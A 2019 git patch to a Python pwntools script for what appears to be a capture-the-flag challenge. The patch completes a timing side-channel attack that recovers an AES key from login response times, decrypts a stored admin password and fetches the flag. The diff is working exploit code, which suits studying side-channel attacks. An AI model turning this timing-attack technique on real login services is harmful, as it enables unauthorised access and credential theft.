From de80694af5468adb36e7f97558e1c4f42e85f3a4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Manuel=20V=C3=B6gele?= Date: Tue, 2 Jul 2019 19:13:17 +0200 Subject: [PATCH] The automated attack now goes all the way of fetching the flag --- break_script/automated_attack.py | 27 ++++++++++++++++++++------- 1 file changed, 20 insertions(+), 7 deletions(-) diff --git a/break_script/automated_attack.py b/break_script/automated_attack.py index bbb7934..d75a230 100755 --- a/break_script/automated_attack.py +++ b/break_script/automated_attack.py @@ -6,6 +6,8 @@ import string import math import threading +from Crypto.Cipher import AES + #context.log_level = "debug" allowed_chars = string.ascii_letters + string.digits + string.punctuation @@ -51,7 +53,7 @@ def gather_measurements_(r, amount, total_amount, measurements, progress, lock): r.recvuntil(b"> ") password = ''.join(random.choices(allowed_chars, k=16)).encode("ascii") r.send(b"login\n") - r.send(password) + r.send("admin") r.send(b"\n") r.send(password) r.send(b"\n") @@ -87,11 +89,11 @@ def t_test(group_big, group_small): variance_small = variance(group_small, mean_small) return (mean_big - mean_small) / math.sqrt(variance_big / len(group_big) + variance_small / len(group_small)) -#remotes = [process("/home/manuel/wolke/Projects/secutech_authenticator/build/default/secutech")] -remotes = [] -no_threads = 50 -for i in range(no_threads): - remotes.append(remote("ccn.li", "5555")) +remotes = [process("/home/manuel/wolke/Projects/secutech_authenticator/build/meson.debug.linux.x86_64/secutech", cwd="/home/manuel/wolke/Projects/secutech_authenticator")] +#remotes = [] +#no_threads = 50 +#for i in range(no_threads): +# remotes.append(remote("ccn.li", "5555")) for r in remotes: r.recvuntil(b"> ") @@ -134,7 +136,7 @@ while len(key) < 16: # The biggest value in the list is our best guess for the value max_t_value = max(t_values) candidate = t_values.index(max_t_value) - progress.success("{:02X} ({:.2})".format(candidate, max_t_value)) + progress.success("{:02X} ({:})".format(candidate, max_t_value)) # Check if we are certain enough to add this result to the key. If not stop attacking and gather more measurements if max_t_value >= 4.5: @@ -142,7 +144,18 @@ while len(key) < 16: else: break +encrypted_adminpw = bytes([0xe3, 0x07, 0x2e, 0x9f, 0x5b, 0xe8, 0xed, 0xd6, 0x02, 0xab, 0x89, 0xb8, 0xeb, 0x49, 0xcc, 0x56]) +aes = AES.new(bytes(key), AES.MODE_ECB) +adminpw = aes.decrypt(encrypted_adminpw) +remotes[0].send("login\nadmin\n") +remotes[0].send(adminpw) +remotes[0].send("\n") +remotes[0].recvuntil("Password: ") +flag = remotes[0].recvuntil("\n") + for r in remotes: r.close() print("Key:", " ".join(["{:02X}".format(k) for k in key])) +print("Adminpw:", adminpw.decode("ascii")) +print("Flag:", flag.decode("ascii"))